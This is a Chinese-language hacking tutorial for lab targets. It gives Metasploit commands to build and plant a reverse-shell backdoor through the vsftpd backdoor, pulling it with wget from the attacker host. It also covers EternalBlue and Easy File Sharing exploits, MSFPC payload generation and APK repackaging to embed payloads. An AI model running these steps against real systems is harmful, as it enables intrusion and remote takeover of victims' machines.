黑客玩具入門——5、繼續Metasploit

1、利用FTP漏洞並植入後門

實驗靶機:Metasploitable2。

實踐:

  1. 使用nmap掃描目標靶機
    1. nmap -sV xxx.xxx.xxx.xxx(目標ip)
  2. 生成linux系統後門
    1. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx(主控端ip) LPORT=5555 -f elf -o /home/xxxx(用戶名)/backdoor.elf
  3. 使用Apache服務在目標主機上下載後門
    1. sudo service apache2 start
    2. sudo cp home/xxxx(用戶名)/backdoor.elf /var/www/html/
  4. 在主控端瀏覽器打開apache服務的ip地址,然後右鍵elf文件,選擇Copy Link Location。
  5. 手工激活ftp後門。登錄名:user:)。密碼:pass
    1. 在主控端命令行輸入:ftp xxx.xxx.xxx.xxx(靶機ip)。
    2. 輸入登錄名密碼即可。
    3. 可以通過:nc xxx.xxx.xxx.xxx(靶機ip)。嘗試判斷是否啓用成功。
  6. 然後在nc的命令行中執行下面的命令,這個地址就是你之前右鍵複製的那個地址。
    1. wget http://192.168.10.129/backdoor.elf
    2. 然後可以通過 cd / --> ls命令。看有沒有這個文件。
  7. 然後,啓用主控端。打開Metasploit,就跟之前一樣。
    1. use exploit/multi/handler
    2. set payload linux/x86/meterpreter/reverse_tcp
    3. set lhost xxx.xxx.xxx.xxx(主控端ip)
    4. set lport 5555
    5. run
  8. 在目標主機上運行後門。以下命令在nc的命令行中操作:
    1. ./backdoor.elf。你會發現權限不足。
    2. chmod 7777 ./backdoor.elf。
    3. 然後再執行就可以了:./backdoor.elf。
  9. 然後,你就可以在meterpreter中爲所欲爲了。

2、常用攻擊軟件

由於Windows7使用了比較安全的機制,所以入侵win7遠比入侵Windows xp要難得多。雖然系統本身很安全,但是我們不可能只安裝一個系統,就什麼都沒有了,系統內我們還會安裝很多軟件,我們就可以從這些應用軟件入手,去尋找他們的漏洞,藉助這些軟件做跳板,去入侵系統。

之前我們使用的是python腳本去攻擊Easy File Sharing軟件,使軟件卡死。併成功在目標計算機上打開了計算器,這回我們使用Metasploit來攻擊這個應用程序。

實驗靶機:Windows7。

實踐:

  1. search easyfilesharing。
  2. use exploit/windows/http/easyfilesharing_seh。
  3. set rhost xxx.xxx.xxx.xxx(目標ip)。
  4. set lport 6666。
  5. run。
  6. execute -f calc.exe。打開計算器。

3、攻擊Windows7系統藍屏

實驗靶機:Windows7。

實踐:

  1. search ms17-010。
  2. use exploit/windows/smb/ms17_010_eternalblue。
  3. set rhost xxx.xxx.xxx.xxx(目標ip)。
  4. set lport 6666。
  5. set payload windows/meterpreter/reverse_tcp。
  6. run。
  7. 然後Windows就藍屏了。

4、漏洞利用工具集:MSFPC

生成payload的默認工具是MSFvenom,這是一個獨立於Metasploit的payload生成器及編輯器。雖然它是一個非常強的payload生成神器,但是對於一個新手來說,可能難以在短時間內熟悉其操作。即使在進程最初的瞭解之後,生成一個基本的payload也需要輸入相當多的內容。

MSFPC,或者說是MSFvenom Payload生成器,其實是一個基於MSFvenom的payload生成器,它簡化了基本的有效載荷創建過程,用戶使用MSFPC可以儘可能簡單的創建Payload。

使用方法:

  1. 漏洞利用工具集 --> msf payload creator --> 打開他。
  2. sudo msfpc windows xxx.xxx.xxx.xxx(當前主機ip) 6666。
  3. 然後會生成這麼多東西:

      

  4. 其實就是把我們之前通過手動配置的東西都自動生成了。包括可執行文件、命令腳本等。我們看下如何來使用這些東西
    1. sudo service apache2 start。
    2. 跟之前一樣,把剛纔生成的可執行文件複製到Apache目錄下。這裏不寫了。
    3. msfconsole -q -r [上面生成的那個.rc文件地址]
    4. 查看session
    5. 使用session。
    6. 成功!

5、Payload 介紹

病毒通常會做一些有害的或者惡意的動作。在病毒代碼中實現這個功能的部分叫做有效載荷(Payload)。Payload可以實現任何運行在受害者環境中的程序所能做的事情。並且能夠執行動作包括破壞文件、刪除文件、向病毒的作者或者任意的接收者發送敏感信息,以及提供通向被感染計算機的後門。

Payloads模塊,也叫有效載荷或有效負載,也就是我們常說的shellcode。在MSF中爲我們提供了大量的Payloads。我們可以再MSF中通過show payloads命令查看。

payloads模塊的命名規則

操作系統/類型/模塊名稱:windows/shell/bind_tcp。

  1. shell_find_taf:在一個已建立的鏈接上創建一個shell
  2. shell_reverse_tcp:反向鏈接到攻擊者主機並創建一個shell
  3. bind_tcp:監聽一個tcp鏈接。
  4. reverse_tcp:反向建立tcp鏈接。
  5. add_user:創建一個新用戶並添加到管理組。

payloads模塊等級

等級代表好用程度,一般分爲以下幾個等級:

  1. normal:正常
  2. excellent:優秀
  3. great:極好
  4. good:好
  5. average:一般、平均
  6. manual:手動

查看payloads下的某個模塊的詳細信息

  1. info [模塊名]
    • info windows/shell/bind_tcp

6、apk文件的反編譯

1)什麼是逆向工程?反編譯?

就是將已有的APP程序,反向操作,方便我們查看裏面的原始文件,因爲我們平時拿到的APP程序都是經過加密處理的。

2)反編譯有什麼用?

可以用來分析APP,比如獲取IP地址。將payload植入其他APP等等。

3)APK反編譯軟件——apktool

  1. 反編譯apk文件
  2. apktool d xxx.apk
  3. 將反編譯後的文件重新打包
  4. apktool b xxx.apk
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章